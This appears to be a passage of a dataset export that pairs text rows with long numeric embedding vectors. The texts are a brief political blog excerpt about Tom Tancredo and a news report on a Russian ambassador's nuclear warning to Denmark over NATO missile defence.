-0.032210540026426315,\n -0.13757288455963135,\n 0.04938977211713791,\n 0.019822003319859505,\n 0.008387511596083641,\n -0.08100186288356781,\n -0.026444721966981888,\n -0.03580261021852493,\n 0.048949409276247025,\n -0.036134060472249985,\n 0.06281914561986923,\n 0.011782960966229439,\n -0.07417695969343185,\n -0.018420996144413948,\n -0.037361547350883484,\n -0.05376773700118065,\n 0.0316009558737278,\n -0.0043936846777796745,\n 0.06064845621585846,\n -0.001505186315625906,\n 0.026724517345428467,\n 0.04016575589776039,\n 0.037064746022224426,\n 0.04530039802193642,\n -0.020816612988710403,\n -0.08307088911533356,\n 0.030980294570326805,\n 0.03833948075771332,\n 0.018443401902914047,\n -0.030666399747133255,\n 0.04831267520785332,\n -0.0010343095054849982,\n -0.010692689567804337,\n 0.023259231820702553,\n 0.08107097446918488,\n 0.014745532535016537,\n -0.008035807870328426,\n -0.041645631194114685,\n 0.04754171893000603,\n -0.017084455117583275,\n -0.049059219658374786,\n 0.05666513368487358,\n -0.05138162896037102,\n -0.01928556151688099,\n -0.014398178085684776,\n -0.005422978196293116,\n 0.1257917881011963,\n 0.1437857300043106,\n -0.06586462259292603,\n -0.060446321964263916,\n -0.08315252512693405,\n -0.014625020325183868,\n 0.06709230691194534,\n 0.029481520876288414,\n -0.0312560610473156,\n -0.021880194544792175,\n -0.006875323131680489\n]"}}},{"rowIdx":1293,"cells":{"text":{"kind":"string","value":"Bask in the cognitive dissonance:\n\nEnjoy the fragile ego:\n\n“Some within the establishment don’t like the fact that I won’t back down to a good-old-boys club. A lot of this has to do with control, power, money.”\n\nWatch the paranoid bonding:\n\nJust two years ago, Tom Tancredo was a veritable outcast of the Republican Party. Karl Rove was screaming at him, John McCain scoffed at him, GOP pollsters viewed him as a saboteur within their midst. Tancredo's one issue--a near-apocalyptic warning about immigrant-driven dilution of American culture--was seen as radioactive among the Republican elite.\n\nEd Morrissey manages to spin all this as shrewd:\n\nThis plays well for Palin. She gets to once again distance herself from the GOP party establishment while also adding to her reputation for political pragmatism. The Republican nominee, Dan Maes, is a disaster for Republicans, and most Republicans have already shifted support from Maes to Tancredo.\n\nWe want to hear what you think about this article. Submit a letter to the editor or write to letters@theatlantic.com."},"embedding":{"kind":"list like","value":[0.01831183023750782,-0.035094503313302994,-0.012789103202521801,-0.03554859384894371,0.008793485350906849,0.09161864221096039,0.0760662704706192,0.024345995858311653,-0.020290005952119827,0.00875120609998703,-0.00127736059948802,0.06672951579093933,0.03332271799445152,-0.06350576877593994,-0.0569472536444664,0.10506980121135712,0.02549702674150467,0.030728977173566818,0.010469842702150345,0.14075322449207306,-0.07547435164451599,-0.05346252769231796,-0.013116271235048771,0.05495082959532738,0.044942520558834076,0.03706938400864601,0.0813194215297699,-0.09148997813463211,-0.17353782057762146,-0.024545341730117798,0.0330793559551239,0.004717857111245394,-0.03738867864012718,-0.012210807763040066,0.009585096500813961,0.014101347886025906,0.05772232264280319,0.013773969374597073,0.0716528594493866,0.0239707138389349,0.022924894466996193,-0.09659671783447266,-0.01705246977508068,-0.025896193459630013,-0.021028222516179085,0.008153297007083893,0.005285700783133507,-0.02535770833492279,0.050657082349061966,-0.07907979190349579,-0.019297337159514427,0.006820521783083677,0.07321383059024811,-0.0737549290060997,0.0039237611927092075,0.007196895312517881,0.017582090571522713,0.07803983986377716,-0.03643672168254852,0.03358124941587448,0.015410859137773514,0.01812111958861351,0.019509606063365936,-0.004215308465063572,0.022741565480828285,0.034788429737091064,-0.03679448366165161,0.035795822739601135,-0.032388702034950256,0.029470698907971382,0.010471145622432232,0.07469376176595688,-0.004427994601428509,-0.00889171939343214,0.013129061087965965,-0.03183148056268692,0.051564980298280716,0.12341281026601791,0.07499830424785614,-0.06227364391088486,0.04744637385010719,0.10394632816314697,-0.015283482149243355,-0.0736178606748581,0.016510844230651855,-0.03712236508727074,-0.01033586822450161,-0.022265683859586716,0.022629350423812866,-0.019674016162753105,-0.03896050900220871,0.02097940631210804,-0.043728407472372055,-0.021940426900982857,0.0718456581234932,-0.04634734243154526,-0.03477524593472481,0.05639300122857094,-0.06029142439365387,0.056592170149087906,-0.01955658383667469,0.07602071762084961,-0.025031644850969315,-0.09240172058343887,-0.01758127100765705,-0.09533189237117767,0.007941550575196743,-0.0223679281771183,0.026979289948940277,-0.02898850478231907,-0.0027072876691818237,-0.02867409959435463,0.05064501613378525,0.01729196310043335,0.0419406034052372,-0.010285764932632446,-0.0033143158070743084,-0.03356721252202988,-0.051730815321207047,0.005810471251606941,0.06308457255363464,-0.03532470762729645,-0.05730940401554108,0.11579078435897827,0.0567355714738369,-0.03209976479411125,-0.08000307530164719,5.064258884740825e-33,0.021020377054810524,0.030315598472952843,-0.023609943687915802,0.04192786663770676,-0.03518775850534439,0.03086216375231743,-0.010290536098182201,-0.12656457722187042,-0.045995038002729416,-0.027894124388694763,-0.0471159927546978,0.048151373863220215,-0.013326795771718025,0.05024102330207825,-0.04934842884540558,0.033715080469846725,-0.14227531850337982,0.03334161639213562,-0.01095969881862402,-0.07619394361972809,-0.026710551232099533,0.11568955332040787,-0.017814164981245995,-0.018617969006299973,-0.03392050042748451,-0.025808444246649742,0.051773205399513245,0.03792136162519455,-0.061575908213853836,0.027386680245399475,-0.009975398890674114,0.004075425677001476,0.013239419087767601,0.07552147656679153,0.03923984616994858,-0.011718583293259144,-0.05190021172165871,-0.0260212030261755,-0.012203863821923733,-0.009187478572130203,-0.009613062255084515,0.06606787443161011,0.010911562480032444,0.19143502414226532,0.010576306842267513,0.04398201406002045,0.08637335896492004,0.007154649123549461,-0.025769826024770737,-0.03140838071703911,0.003011379623785615,0.05004056915640831,0.059620581567287445,0.020513053983449936,-0.05235813185572624,-0.08680187910795212,-0.054976142942905426,-0.012687699869275093,-0.0191530492156744,-0.11304919421672821,0.05230234935879707,0.020298846065998077,-0.08424016833305359,-0.08694785088300705,-0.06755504757165909,0.04419923946261406,-0.08856362104415894,-0.003914073575288057,0.057740241289138794,-0.022836199030280113,0.08738499879837036,-0.007234771735966206,-0.0693034678697586,0.08923429995775223,-0.09043198823928833,-0.03429971635341644,0.07717438042163849,-0.0360347144305706,0.005657099653035402,-0.03769826516509056,-0.009582947939634323,-0.0496726855635643,0.04935653135180473,-0.09658222645521164,-0.027474818751215935,0.030897654592990875,0.062159646302461624,-0.01161144208163023,0.020901665091514587,0.067985400557518,0.012233703397214413,0.05503053218126297,0.00008117233664961532,-0.06647646427154541,-0.03466346859931946,-5.4707294028918174e-33,-0.0637410581111908,-0.06561010330915451,-0.07842749357223511,0.08490616828203201,0.02222815714776516,-0.01406894437968731,0.02376818284392357,-0.04136504977941513,0.033304695039987564,-0.11848799884319305,0.007138020358979702,-0.02056177705526352,0.05077029764652252,0.05574315786361694,0.019673293456435204,-0.05601644515991211,0.056523628532886505,0.016522541642189026,-0.010668737813830376,-0.06150371953845024,0.061073221266269684,0.08138997852802277,-0.07376609742641449,0.08124260604381561,0.0017287398222833872,-0.0018468534108251333,-0.03434014692902565,-0.054215867072343826,-0.028870968148112297,-0.03955996781587601,0.012069625779986382,0.03198305144906044,-0.013092165812849998,0.024776574224233627,0.023615838959813118,0.07272626459598541,-0.06533738225698471,-0.02638375200331211,-0.07306317239999771,0.025626368820667267,0.008173235692083836,-0.11195056885480881,-0.063436359167099,-0.06509038805961609,-0.00022739126870874316,0.013090464286506176,-0.025792459025979042,0.02956307865679264,-0.0359446257352829,0.02428271248936653,-0.07963933050632477,0.025068851187825203,-0.015722252428531647,0.08529656380414963,0.0033429425675421953,-0.015206980518996716,-0.0494619756937027,0.021020006388425827,-0.03136812523007393,0.052050359547138214,-0.0266906525939703,0.019303275272250175,0.03648684546351433,-0.07269138097763062,0.024255890399217606,-0.001447694026865065,0.009465107694268227,0.016086997464299202,0.029840806499123573,-0.014902614988386631,-0.0021086842752993107,-0.059498533606529236,-0.06701274961233139,0.010688737034797668,-0.014074627310037613,0.021915510296821594,-0.07809809595346451,0.0817570686340332,-0.060102567076683044,-0.006661710795015097,-0.04084428772330284,-0.102439284324646,0.013234786689281464,-0.05031682550907135,0.00036936637479811907,0.1483011096715927,0.011569740250706673,-0.0682632252573967,-0.050117138773202896,0.02582266740500927,-0.0022558856289833784,-0.0738295242190361,-0.0802217498421669,-0.005751537159085274,0.01063497457653284,-6.623898229918268e-8,0.0934101790189743,0.00880301371216774,-0.05083813518285751,0.03308020159602165,-0.027060965076088905,0.00644034706056118,-0.017501451075077057,-0.005374936852604151,-0.10286589711904526,0.08673001080751419,0.04710209369659424,-0.022724291309714317,0.03024378977715969,-0.027583256363868713,0.037408046424388885,0.023820867761969566,0.030782710760831833,0.06791556626558304,-0.07805967330932617,-0.01786424219608307,0.020492220297455788,0.00851064920425415,0.022155573591589928,0.05753760412335396,-0.027377722784876823,0.01693856529891491,-0.025475235655903816,0.05488361418247223,0.10637969523668289,-0.032139115035533905,-0.008813376538455486,0.012869812548160553,-0.06326692551374435,0.00523065822198987,0.003428233787417412,0.06291806697845459,-0.07985062152147293,0.10501802712678909,0.05795012786984444,0.04691500961780548,-0.024143027141690254,0.013995557092130184,0.043128810822963715,0.021230028942227364,-0.01980750262737274,-0.026771167293190956,0.026553582400083542,0.01344696432352066,0.04788273945450783,0.008029839023947716,0.049026161432266235,0.06639564782381058,-0.011950532905757427,0.0596555732190609,0.018294664099812508,-0.026488523930311203,0.0006044344045221806,0.04768218472599983,-0.06815072894096375,0.01979421079158783,-0.02508876658976078,-0.030397353693842888,0.025813542306423187,0.016981488093733788],"string":"[\n 0.01831183023750782,\n -0.035094503313302994,\n -0.012789103202521801,\n -0.03554859384894371,\n 0.008793485350906849,\n 0.09161864221096039,\n 0.0760662704706192,\n 0.024345995858311653,\n -0.020290005952119827,\n 0.00875120609998703,\n -0.00127736059948802,\n 0.06672951579093933,\n 0.03332271799445152,\n -0.06350576877593994,\n -0.0569472536444664,\n 0.10506980121135712,\n 0.02549702674150467,\n 0.030728977173566818,\n 0.010469842702150345,\n 0.14075322449207306,\n -0.07547435164451599,\n -0.05346252769231796,\n -0.013116271235048771,\n 0.05495082959532738,\n 0.044942520558834076,\n 0.03706938400864601,\n 0.0813194215297699,\n -0.09148997813463211,\n -0.17353782057762146,\n -0.024545341730117798,\n 0.0330793559551239,\n 0.004717857111245394,\n -0.03738867864012718,\n -0.012210807763040066,\n 0.009585096500813961,\n 0.014101347886025906,\n 0.05772232264280319,\n 0.013773969374597073,\n 0.0716528594493866,\n 0.0239707138389349,\n 0.022924894466996193,\n -0.09659671783447266,\n -0.01705246977508068,\n -0.025896193459630013,\n -0.021028222516179085,\n 0.008153297007083893,\n 0.005285700783133507,\n -0.02535770833492279,\n 0.050657082349061966,\n -0.07907979190349579,\n -0.019297337159514427,\n 0.006820521783083677,\n 0.07321383059024811,\n -0.0737549290060997,\n 0.0039237611927092075,\n 0.007196895312517881,\n 0.017582090571522713,\n 0.07803983986377716,\n -0.03643672168254852,\n 0.03358124941587448,\n 0.015410859137773514,\n 0.01812111958861351,\n 0.019509606063365936,\n -0.004215308465063572,\n 0.022741565480828285,\n 0.034788429737091064,\n -0.03679448366165161,\n 0.035795822739601135,\n -0.032388702034950256,\n 0.029470698907971382,\n 0.010471145622432232,\n 0.07469376176595688,\n -0.004427994601428509,\n -0.00889171939343214,\n 0.013129061087965965,\n -0.03183148056268692,\n 0.051564980298280716,\n 0.12341281026601791,\n 0.07499830424785614,\n -0.06227364391088486,\n 0.04744637385010719,\n 0.10394632816314697,\n -0.015283482149243355,\n -0.0736178606748581,\n 0.016510844230651855,\n -0.03712236508727074,\n -0.01033586822450161,\n -0.022265683859586716,\n 0.022629350423812866,\n -0.019674016162753105,\n -0.03896050900220871,\n 0.02097940631210804,\n -0.043728407472372055,\n -0.021940426900982857,\n 0.0718456581234932,\n -0.04634734243154526,\n -0.03477524593472481,\n 0.05639300122857094,\n -0.06029142439365387,\n 0.056592170149087906,\n -0.01955658383667469,\n 0.07602071762084961,\n -0.025031644850969315,\n -0.09240172058343887,\n -0.01758127100765705,\n -0.09533189237117767,\n 0.007941550575196743,\n -0.0223679281771183,\n 0.026979289948940277,\n -0.02898850478231907,\n -0.0027072876691818237,\n -0.02867409959435463,\n 0.05064501613378525,\n 0.01729196310043335,\n 0.0419406034052372,\n -0.010285764932632446,\n -0.0033143158070743084,\n -0.03356721252202988,\n -0.051730815321207047,\n 0.005810471251606941,\n 0.06308457255363464,\n -0.03532470762729645,\n -0.05730940401554108,\n 0.11579078435897827,\n 0.0567355714738369,\n -0.03209976479411125,\n -0.08000307530164719,\n 5.064258884740825e-33,\n 0.021020377054810524,\n 0.030315598472952843,\n -0.023609943687915802,\n 0.04192786663770676,\n -0.03518775850534439,\n 0.03086216375231743,\n -0.010290536098182201,\n -0.12656457722187042,\n -0.045995038002729416,\n -0.027894124388694763,\n -0.0471159927546978,\n 0.048151373863220215,\n -0.013326795771718025,\n 0.05024102330207825,\n -0.04934842884540558,\n 0.033715080469846725,\n -0.14227531850337982,\n 0.03334161639213562,\n -0.01095969881862402,\n -0.07619394361972809,\n -0.026710551232099533,\n 0.11568955332040787,\n -0.017814164981245995,\n -0.018617969006299973,\n -0.03392050042748451,\n -0.025808444246649742,\n 0.051773205399513245,\n 0.03792136162519455,\n -0.061575908213853836,\n 0.027386680245399475,\n -0.009975398890674114,\n 0.004075425677001476,\n 0.013239419087767601,\n 0.07552147656679153,\n 0.03923984616994858,\n -0.011718583293259144,\n -0.05190021172165871,\n -0.0260212030261755,\n -0.012203863821923733,\n -0.009187478572130203,\n -0.009613062255084515,\n 0.06606787443161011,\n 0.010911562480032444,\n 0.19143502414226532,\n 0.010576306842267513,\n 0.04398201406002045,\n 0.08637335896492004,\n 0.007154649123549461,\n -0.025769826024770737,\n -0.03140838071703911,\n 0.003011379623785615,\n 0.05004056915640831,\n 0.059620581567287445,\n 0.020513053983449936,\n -0.05235813185572624,\n -0.08680187910795212,\n -0.054976142942905426,\n -0.012687699869275093,\n -0.0191530492156744,\n -0.11304919421672821,\n 0.05230234935879707,\n 0.020298846065998077,\n -0.08424016833305359,\n -0.08694785088300705,\n -0.06755504757165909,\n 0.04419923946261406,\n -0.08856362104415894,\n -0.003914073575288057,\n 0.057740241289138794,\n -0.022836199030280113,\n 0.08738499879837036,\n -0.007234771735966206,\n -0.0693034678697586,\n 0.08923429995775223,\n -0.09043198823928833,\n -0.03429971635341644,\n 0.07717438042163849,\n -0.0360347144305706,\n 0.005657099653035402,\n -0.03769826516509056,\n -0.009582947939634323,\n -0.0496726855635643,\n 0.04935653135180473,\n -0.09658222645521164,\n -0.027474818751215935,\n 0.030897654592990875,\n 0.062159646302461624,\n -0.01161144208163023,\n 0.020901665091514587,\n 0.067985400557518,\n 0.012233703397214413,\n 0.05503053218126297,\n 0.00008117233664961532,\n -0.06647646427154541,\n -0.03466346859931946,\n -5.4707294028918174e-33,\n -0.0637410581111908,\n -0.06561010330915451,\n -0.07842749357223511,\n 0.08490616828203201,\n 0.02222815714776516,\n -0.01406894437968731,\n 0.02376818284392357,\n -0.04136504977941513,\n 0.033304695039987564,\n -0.11848799884319305,\n 0.007138020358979702,\n -0.02056177705526352,\n 0.05077029764652252,\n 0.05574315786361694,\n 0.019673293456435204,\n -0.05601644515991211,\n 0.056523628532886505,\n 0.016522541642189026,\n -0.010668737813830376,\n -0.06150371953845024,\n 0.061073221266269684,\n 0.08138997852802277,\n -0.07376609742641449,\n 0.08124260604381561,\n 0.0017287398222833872,\n -0.0018468534108251333,\n -0.03434014692902565,\n -0.054215867072343826,\n -0.028870968148112297,\n -0.03955996781587601,\n 0.012069625779986382,\n 0.03198305144906044,\n -0.013092165812849998,\n 0.024776574224233627,\n 0.023615838959813118,\n 0.07272626459598541,\n -0.06533738225698471,\n -0.02638375200331211,\n -0.07306317239999771,\n 0.025626368820667267,\n 0.008173235692083836,\n -0.11195056885480881,\n -0.063436359167099,\n -0.06509038805961609,\n -0.00022739126870874316,\n 0.013090464286506176,\n -0.025792459025979042,\n 0.02956307865679264,\n -0.0359446257352829,\n 0.02428271248936653,\n -0.07963933050632477,\n 0.025068851187825203,\n -0.015722252428531647,\n 0.08529656380414963,\n 0.0033429425675421953,\n -0.015206980518996716,\n -0.0494619756937027,\n 0.021020006388425827,\n -0.03136812523007393,\n 0.052050359547138214,\n -0.0266906525939703,\n 0.019303275272250175,\n 0.03648684546351433,\n -0.07269138097763062,\n 0.024255890399217606,\n -0.001447694026865065,\n 0.009465107694268227,\n 0.016086997464299202,\n 0.029840806499123573,\n -0.014902614988386631,\n -0.0021086842752993107,\n -0.059498533606529236,\n -0.06701274961233139,\n 0.010688737034797668,\n -0.014074627310037613,\n 0.021915510296821594,\n -0.07809809595346451,\n 0.0817570686340332,\n -0.060102567076683044,\n -0.006661710795015097,\n -0.04084428772330284,\n -0.102439284324646,\n 0.013234786689281464,\n -0.05031682550907135,\n 0.00036936637479811907,\n 0.1483011096715927,\n 0.011569740250706673,\n -0.0682632252573967,\n -0.050117138773202896,\n 0.02582266740500927,\n -0.0022558856289833784,\n -0.0738295242190361,\n -0.0802217498421669,\n -0.005751537159085274,\n 0.01063497457653284,\n -6.623898229918268e-8,\n 0.0934101790189743,\n 0.00880301371216774,\n -0.05083813518285751,\n 0.03308020159602165,\n -0.027060965076088905,\n 0.00644034706056118,\n -0.017501451075077057,\n -0.005374936852604151,\n -0.10286589711904526,\n 0.08673001080751419,\n 0.04710209369659424,\n -0.022724291309714317,\n 0.03024378977715969,\n -0.027583256363868713,\n 0.037408046424388885,\n 0.023820867761969566,\n 0.030782710760831833,\n 0.06791556626558304,\n -0.07805967330932617,\n -0.01786424219608307,\n 0.020492220297455788,\n 0.00851064920425415,\n 0.022155573591589928,\n 0.05753760412335396,\n -0.027377722784876823,\n 0.01693856529891491,\n -0.025475235655903816,\n 0.05488361418247223,\n 0.10637969523668289,\n -0.032139115035533905,\n -0.008813376538455486,\n 0.012869812548160553,\n -0.06326692551374435,\n 0.00523065822198987,\n 0.003428233787417412,\n 0.06291806697845459,\n -0.07985062152147293,\n 0.10501802712678909,\n 0.05795012786984444,\n 0.04691500961780548,\n -0.024143027141690254,\n 0.013995557092130184,\n 0.043128810822963715,\n 0.021230028942227364,\n -0.01980750262737274,\n -0.026771167293190956,\n 0.026553582400083542,\n 0.01344696432352066,\n 0.04788273945450783,\n 0.008029839023947716,\n 0.049026161432266235,\n 0.06639564782381058,\n -0.011950532905757427,\n 0.0596555732190609,\n 0.018294664099812508,\n -0.026488523930311203,\n 0.0006044344045221806,\n 0.04768218472599983,\n -0.06815072894096375,\n 0.01979421079158783,\n -0.02508876658976078,\n -0.030397353693842888,\n 0.025813542306423187,\n 0.016981488093733788\n]"}}},{"rowIdx":1294,"cells":{"text":{"kind":"string","value":"Tensions between Denmark and Russia were ratcheted up a notch on Saturday.\n\nRussia’s ambassador to Denmark, Mikhail Vanin, wrote in an opinion piece published by Jyllands-Posten that Denmark has made itself a target of a potential nuclear attack by joining Nato’s missile defence system\n\n“I don’t think the Danes fully understand the consequences of what will happen if Denmark joins the American-controlled missile defence. If it happens, Danish war ships will become targets for Russian atomic missiles,” Vanin wrote.\n\nDenmark announced in August that it will will contribute at least one frigate to Nato’s defence system. At the time, Defence Minister Nicolai Wammen said that joining the missile defence system was not a move aimed at Russia.\n\n“That Denmark will join the missile defence system with radar capacity on one or more of our frigates is not an action that is targeted against Russia, but rather to protect us against rogues states, terrorist organisations and others that have the capacity to fire missiles at Europe and the US,” Wammen told Jyllands-Posten in August\n\nVanin’s op-ed made it clear that Russia doesn’t share that interpretation.\n\n“Denmark will become a part of the threat against Russia. It will be less peaceful and the relationship with Russia will be harmed. It is of course your decision – I want to simply remind you that it will cost you both money and security,” Vanin wrote.\n\n“At the same time, Russia has missiles that are guaranteed to break through future global missile defence systems,” he continued.\n\nDanish Foreign Minister Martin Lidegaard called Vanin’s statements “unacceptable”.\n\n“Russia knows fully well that Nato’s missile defence is not aimed at them. We are in disagreement with Russia on a number of important things but it is important that the tone between us does not escalate,” Lidegaard told Jyllands-Posten.\n\nThe US ambassador to Denmark, Rufus Gifford, also responded to Vanin's remarks.\n\n\"We stand with our staunch Nato ally Denmark in condemning the unacceptable statements made by Russia's Ambassador to Denmark. We have made clear that Nato's ballistic missile defence is not directed at any country, but is meant to defend against missile threats,\" Gifford wrote on Facebook.\n\nOn Twitter, he added that \"such statements do not inspire confidence or contribute to peace and stability\":\n\nUS stands w/ DK in condemning statements made by Russia's Amb to DK. Such statements do not inspire confidence or contrib to peace/stability — Rufus Gifford (@rufusgifford) March 21, 2015\n\nDenmark’s relationship with Russia has been strained by increased Russian airspace activity over and near Denmark.\n\nVanin is not exactly a stranger to controversial statements. Following the December near-miss with the SAS, he suggested that Swedish authorities may have imagined the whole thing after smoking too much cannabis\n\n\"The Swedish authorities also recently said there was a submarine in their waters. There wasn’t. Now they say again that they have seen something. I'm afraid the Swedes visit Pusher Street very often,\" Vanin told Berlingske, referring to the Christiania neighbourhood in Copenhagen known for its cannabis trade.\n\n“In terms of our territory, we are not worried. We keep our heads calm and the cockpit warm,” she said.\n\nWammen has also said that Denmark would not hesitate to stand up to Russia telling the Financial Times that “the Russians know we will do what is necessary.”"},"embedding":{"kind":"list like","value":[-0.052584804594516754,0.07830525934696198,-0.032895296812057495,-0.011162305250763893,0.05678526312112808,0.017038755118846893,0.041091009974479675,0.015084532089531422,0.025779208168387413,-0.05422091484069824,-0.07110186666250229,0.0399693064391613,0.08011971414089203,0.06084835156798363,-0.0012515499256551266,-0.007747887633740902,0.014809131622314453,-0.052575066685676575,-0.03971034660935402,0.06687933951616287,-0.08115202188491821,-0.029720742255449295,0.09484200924634933,-0.0856960117816925,-0.016678089275956154,0.016696114093065262,0.11908552795648575,-0.027354374527931213,-0.14888902008533478,0.04807319492101669,0.01900480128824711,-0.11407683044672012,-0.12499655038118362,0.05387100577354431,-0.008926229551434517,0.021748127415776253,-0.002514915307983756,-0.07005366683006287,0.07172095775604248,0.05545411258935928,-0.009209554642438889,-0.01400795578956604,-0.01805282011628151,0.009458140470087528,-0.0280240997672081,0.08218342065811157,-0.04583451524376869,-0.05306069180369377,-0.09459351748228073,0.01045397948473692,-0.02188386395573616,-0.023753803223371506,0.02877979539334774,-0.057184211909770966,0.06568574905395508,0.00507922051474452,-0.04703722149133682,0.07887087017297745,-0.036000583320856094,-0.06585435569286346,-0.03841383010149002,-0.09041178971529007,0.05283541604876518,-0.03227389603853226,-0.012284677475690842,-0.051820822060108185,-0.01614745706319809,0.0973874107003212,-0.05081138387322426,0.04549362137913704,0.016006262972950935,0.059198860079050064,-0.030656538903713226,-0.020124755799770355,0.08011047542095184,-0.03965336084365845,-0.0013371158856898546,0.00017193544772453606,0.06026027724146843,-0.07138717919588089,0.0025276425294578075,-0.0321049727499485,-0.09324988722801208,-0.046085234731435776,0.016776971518993378,0.0017669567605480552,0.11898750811815262,-0.026039354503154755,0.030554383993148804,0.069541335105896,0.061868272721767426,-0.05239682272076607,0.042701784521341324,0.06659913063049316,0.012906540185213089,0.010498784482479095,0.04276413097977638,0.005006777122616768,-0.07973074167966843,-0.0027294724714010954,0.026135403662919998,0.07611716538667679,0.03011263720691204,-0.014334186911582947,-0.09341730922460556,-0.02757357619702816,-0.054539065808057785,-0.045362088829278946,0.0055362205021083355,-0.0374181792140007,-0.01320021040737629,-0.0967014878988266,-0.013134711422026157,-0.1057017520070076,-0.03276900202035904,0.017531899735331535,-0.037929024547338486,-0.04144159331917763,0.02849847450852394,-0.059814177453517914,0.051629673689603806,-0.030310794711112976,0.048627663403749466,0.14376366138458252,0.0584089495241642,0.11473115533590317,-0.1115351989865303,2.1580999969082227e-33,-0.040947120636701584,0.013250741176307201,-0.04799174889922142,0.022810807451605797,-0.07446552067995071,-0.059531912207603455,-0.02932456135749817,-0.002751821419224143,-0.053707826882600784,0.00225628144107759,-0.07941240072250366,-0.03811729699373245,-0.04009968414902687,0.047146473079919815,0.03367257118225098,0.007174718659371138,0.07642293721437454,0.05801292881369591,-0.026579154655337334,0.08569172769784927,0.11218532174825668,-0.011064687743782997,0.03311433643102646,0.03348391503095627,0.02362978458404541,-0.005760463420301676,-0.02202456258237362,0.04235614091157913,-0.02605976164340973,-0.00525578623637557,-0.06585625559091568,0.042481325566768646,-0.052543170750141144,-0.014698364771902561,-0.013057013042271137,-0.006035822443664074,-0.09361845254898071,0.00031658419175073504,-0.0235345009714365,-0.01645861193537712,0.07044651359319687,-0.03952668234705925,-0.02305733412504196,0.036246493458747864,0.11474836617708206,-0.09942404180765152,-0.04179791361093521,-0.01701723225414753,-0.026521261781454086,-0.06652576476335526,0.000315043464070186,-0.006859920918941498,0.0810471698641777,0.05267903953790665,0.034008827060461044,-0.0768124908208847,-0.02526879496872425,0.03018265962600708,0.05362445488572121,-0.0592074878513813,-0.05700914189219475,-0.10696031153202057,0.01604587957262993,0.03668176755309105,0.06298159807920456,0.06424029171466827,0.009305321611464024,0.03972647711634636,-0.06720899045467377,0.06433072686195374,0.04072083905339241,-0.017991745844483376,0.07347837835550308,0.055309001356363297,-0.004536505788564682,0.02886894717812538,0.016351869329810143,0.002350687747821212,0.08029573410749435,0.02193775400519371,-0.07854519039392471,0.020139340311288834,0.045673903077840805,0.020921798422932625,-0.050788648426532745,-0.030331267043948174,-0.017197920009493828,-0.06826122105121613,-0.0067853908985853195,0.0731004998087883,-0.025696981698274612,-0.035403527319431305,-0.0491139180958271,0.05178830027580261,0.0026015567127615213,-3.896974627275062e-33,-0.009815866127610207,0.0666271299123764,-0.11597715318202972,-0.009545053355395794,-0.0466751903295517,0.04663592576980591,0.011013822630047798,0.040564075112342834,-0.05960620194673538,-0.005903576500713825,0.010203712619841099,-0.10104180872440338,-0.031042952090501785,0.08108571171760559,-0.003743154462426901,0.017640890553593636,0.1193377897143364,0.10272061824798584,0.0044348579831421375,-0.07564405351877213,0.05135291442275047,-0.062352027744054794,-0.0007617055671289563,0.030257750302553177,0.040723491460084915,0.020913777872920036,0.09724419564008713,-0.018789872527122498,-0.08571822941303253,-0.05118118226528168,-0.009694617241621017,0.003515578806400299,0.02775954082608223,0.08730202913284302,0.03284713253378868,0.056012023240327835,0.0457480363547802,-0.0032455846667289734,-0.031346894800662994,0.004602415952831507,0.029167696833610535,-0.07254885137081146,-0.03862849250435829,0.08275530487298965,-0.044242504984140396,-0.05101567134261131,0.06683921813964844,0.10552644729614258,0.0000687463179929182,-0.024234799668192863,-0.04056473821401596,0.03951696306467056,0.009777332656085491,-0.09246315062046051,0.010631393641233444,0.021251888945698738,0.024890271946787834,-0.020427541807293892,0.10444489121437073,-0.018550563603639603,0.009623019956052303,0.00027408095775172114,0.06452324241399765,0.007656199857592583,-0.059088632464408875,0.009755660779774189,-0.05237327143549919,0.04223770648241043,0.08226162940263748,0.026585692539811134,0.05036287382245064,0.002505392301827669,0.045567434281110764,0.014935814775526524,0.04851355776190758,-0.04365326836705208,0.010357963852584362,0.02373109944164753,-0.031022684648633003,0.013956527225673199,-0.05280456691980362,-0.0901646688580513,-0.07311349362134933,-0.02552243322134018,0.009461071342229843,0.03906337916851044,0.019625172019004822,-0.049321532249450684,-0.0335397906601429,-0.06786243617534637,-0.05434538424015045,-0.01793256774544716,-0.009404698386788368,0.025365544483065605,-0.05348614230751991,-4.9940364732492526e-8,0.05213306099176407,-0.03216135501861572,-0.0049612317234277725,-0.0065375929698348045,-0.03262085095047951,0.010192019864916801,-0.012970774434506893,-0.02213939279317856,-0.08528418838977814,-0.015710102394223213,0.023460807278752327,0.01595367304980755,-0.04055522382259369,-0.017515093088150024,0.009933874011039734,0.026964375749230385,0.006597036961466074,-0.02222629263997078,-0.06796664744615555,-0.02951662242412567,-0.001701928093098104,0.01642942614853382,-0.0812319666147232,0.007260218728333712,-0.004247289150953293,0.04320739209651947,0.012048904784023762,0.03126479312777519,0.008629649877548218,-0.05884688347578049,0.03446667268872261,-0.05512944608926773,-0.0307157039642334,0.04227856919169426,0.004790252074599266,0.05745123326778412,0.010204414837062359,0.0006586037343367934,-0.0004006456001661718,0.023798799142241478,-0.07885779440402985,0.049758508801460266,0.005610066466033459,0.06039297208189964,-0.03772537410259247,-0.012959943152964115,-0.05098150670528412,-0.07336466014385223,0.003925350494682789,0.008457073010504246,-0.013005477376282215,0.035156767815351486,-0.0071088154800236225,0.02882387489080429,-0.04032854735851288,0.1196461021900177,0.025265462696552277,-0.03353484719991684,0.08700904250144958,0.0720800906419754,-0.02191094681620598,-0.060122255235910416,-0.011603276245296001,0.02554982155561447],"string":"[\n -0.052584804594516754,\n 0.07830525934696198,\n -0.032895296812057495,\n -0.011162305250763893,\n 0.05678526312112808,\n 0.017038755118846893,\n 0.041091009974479675,\n 0.015084532089531422,\n 0.025779208168387413,\n -0.05422091484069824,\n -0.07110186666250229,\n 0.0399693064391613,\n 0.08011971414089203,\n 0.06084835156798363,\n -0.0012515499256551266,\n -0.007747887633740902,\n 0.014809131622314453,\n -0.052575066685676575,\n -0.03971034660935402,\n 0.06687933951616287,\n -0.08115202188491821,\n -0.029720742255449295,\n 0.09484200924634933,\n -0.0856960117816925,\n -0.016678089275956154,\n 0.016696114093065262,\n 0.11908552795648575,\n -0.027354374527931213,\n -0.14888902008533478,\n 0.04807319492101669,\n 0.01900480128824711,\n -0.11407683044672012,\n -0.12499655038118362,\n 0.05387100577354431,\n -0.008926229551434517,\n 0.021748127415776253,\n -0.002514915307983756,\n -0.07005366683006287,\n 0.07172095775604248,\n 0.05545411258935928,\n -0.009209554642438889,\n -0.01400795578956604,\n -0.01805282011628151,\n 0.009458140470087528,\n -0.0280240997672081,\n 0.08218342065811157,\n -0.04583451524376869,\n -0.05306069180369377,\n -0.09459351748228073,\n 0.01045397948473692,\n 